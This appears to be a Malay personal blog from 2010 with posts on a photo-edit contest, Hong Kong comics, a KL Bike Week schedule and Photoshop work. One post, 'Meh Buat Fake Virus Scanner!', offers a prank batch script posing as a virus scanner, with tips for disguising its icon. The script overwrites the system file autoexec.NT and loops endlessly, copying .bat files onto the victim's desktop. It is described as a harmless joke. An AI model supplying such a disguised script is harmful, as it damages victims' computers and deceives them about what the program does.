Monday, December 27, 2010

Edit Photo Battle!!

erk.. pi opis, tengok-tengok aku sorang je ada kat floor tu.. hampeh, suma pakat cuti ramai-ramai.. hoo, kali ni aku join contest anjuran Kapitan Mirul.. seorang diktator dari Empayar Bintang Tiga..


Sapa-sapa nak berada di bawah pemerintahan Kapitan Mirul boleh la klik banner diatas.. cakap banyak pun tak guna.. tarikh tutup 25 Januari 2011.

So, ni hasil amatur aku..
Sebelum
Selepas
Kena tag 4 minion plak.. 

Monday, December 20, 2010

Meh Buat Fake Virus Scanner!


Yosh!! Sempena pagi isnin yang malas ni,aku nak tunjukkan korang cara simple nak buat virus scanner.. tipu-tipu punya, yang akan scan non-stop. Sesuai untuk prank kengkawan.
p/s: jangan prank cikgu korang, kena tampar sia-sia je nanti..

1. Bukak notepad, (Start>Run>Notepad)

2. Copy command kat bawah ni, untuk copy korang highlight command tu dan tekan CTRL+C (xleh right click arr..)

@echo off
echo checking system:
echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT
echo AMARAN!!VIRUS DIKESAN
pause
echo KUARANTIN VIRUS TERSEBUT?
pause
:RETURN
dir /s
copy c:\tmp.bat c:\docum~1\%username%\desktop\greatgame_%random%.bat
goto RETURN

3. Save file tu dalam bentuk .bat (contoh: Virus Scanner.bat)

4. Setel!!Korang boleh test..

p/s: untuk nampak scanner tu lebih meyakinkan,korang boleh ubah icon file tu. Caranya ada aku tulis dalam entry sebelum ni..

p/s: untuk hentikan proses, korang boleh tekan CTRL+C.

Friday, December 17, 2010

Nostalgia Komik Hong Kong!


Korang penah baca komik-komik ni? Kalau pernah, tahniah! Usia kita memang tak lari jauh la.. Aku ingat lagi masa tu komik-komik Hong Kong memang femes, manga dari Jepun masa tu orang pun tak biasa dengar lagi.. orang dengar Doraemon tu pun dari siri animasi je..

Kat kawasan aku, komik paling femes time tu Pendekar Laut.. kalau main semua berebut nak jadi Pendekar Laut, paling menarik tentang komik ni adalah konsep belang tarung. Hahaha.. sampai kalau ada urat timbul atau parut kat dahi tu budak-budak panggil belang tarung. Komik Pendekar Laut dan francais dia je iaitu Wira Tunggal yang ada belang tarung. Komik len mana ada kan? hahaha..Masa tu, antara watak paling kuat dalam komik Pendekar Laut ialah Pendekar Laut(Pai Cheung Lang, Jerung Raksasa, Orga The Killer Whale(ni pun aku minat gak ni..) dan Penjejak Neraka. Jalan cerita komik ni panjang gila siot, sampai beberapa generasi dan ada sambungan di komik Wira Tunggal plak..


Cara mati pun unik, kalau komik lain wataknya mati berdarah kena tetak.. dalam komik ni wataknya (hanya yang mempunyai kuasa je..watak biasa mati macam biasa) mati samaada badan diaorang berkecai macam kaca atau berkecai jadi kiub.. hehe,unik siot!


Sini aku listkan komik-komik HK lain yang femes time tu (untuk orang yang lahir antara 80an-90an);
1. Pendekar laut
2. Wira Tunggal
3. Raja Rimba
4. Pedang Setiawan
5. Jengking Merah
6. Golok Keramat
7. Senjata Misteri
8. Alam Perwira
9. Juara-juara Kembar
10. Guruh Badai

Wednesday, December 15, 2010

Jom Pi KL Bike Week 2010

Last Bike Fest aku pi hari tu kat Eagle Ranch Resort,PD. Boleh dikatakan agak happening jugak la.. dan boleh jadi port untuk korang cuci-cuci mata dan untuk kaki photographer ada banyak scope kan situ boleh korang snap..

So, untuk kesekian kalinya KL Bike Week dianjurkan oleh Red Garage akan berlangsung di MaTiC,Jalan Ampang pada 24-25hb Disember 2010. Masuk  FREE je.. kecuali korang nak participate dalam event tu, kena bayar la.. dan untuk yang participate dapat la goodies dan lain-lain.

klik gambar untuk paparan lebih jelas

Jumaat 24 Disember 2010
10.00am–12.00pm :
Ruang pameran dan perniagaan telah di buka untuk orang awam

3.00pm – 6.00pm :
Pertandingan Battle of the Band

4.00pm – 6.00pm :
Pendaftaran Peserta di Kawasan Padang Letak Kereta Matic

6.00pm – 8.00pm :
"Welcome Dinner" di The Lanai, Matic(disediakan oleh pihak penganjur kepada biker yang berdaftar)

8.00pm–12.00am:
Konsert:
-Strike 5
-Azlan and Typewriter
-Republic of Brickfields (ROB)

12.00am :
Acara bersurai

Sabtu 25 Disember 2010
10.00am–12.oopm :
Ruang pameran dan perniagaan telah di buka untuk orang awam

11.00am-1.00pm:
Ride Session with Red Garage and Harley Davidson Bike (especially for non-bikers)

11.00am-4.00pm:
Acara Bikers Game bermula
-Mr KL Bike Week
-Mr Perfect Thor
-Mr Perfect Ride

12.00pm– 6.00pm :
Pertandingan Battle of the Band

2.00pm– 4.00pm :
1) Pertandingan Motorsikal (di undi oleh penunggang motor dan juga di adili oleh hakim)
• Best Customs American Choppers (Pro Street and Choppers)
• Best Customs Japanese Choppers
• Best Customs Local Choppers
• Best Classic
• Best Superbike
• Best Baggers/Touring
2) Jualan lelong Belanda Barangan Motor

4.30pm – 6.30pm :
Acara Konvoi Sunset Ride “Love Rode Not War” menggelilingfi Bandaraya Kuala Lumpur-Putrajaya- Kuala Lumpur.

7.45pm-8pm :
Pengumuman Pemenang Battle of the Band

8.00pm–10.00pm :
Konsert
• Pemenang Battle of the Band
• Kugiran Tepi Pantai

10.00pm-10.30pm:
-Pengumuman bagi Bike Competition
-Majlis Penyampaian Cenderamata kepada kelab-kelab motorsikal

10.30pm-12.00am:
Konsert
• Pure Vibracion

12.00 am :
Majlis bersurai di Matic

*Mengikut perubahan semasa

Monday, December 13, 2010

Hedayat7's Photomanipulation Sketch

Mangsa: Hedayat7
Perisian: Adobe Photoshop CS3
Kaedah: magnetic lasso, masking, overlay layer, artistic filter..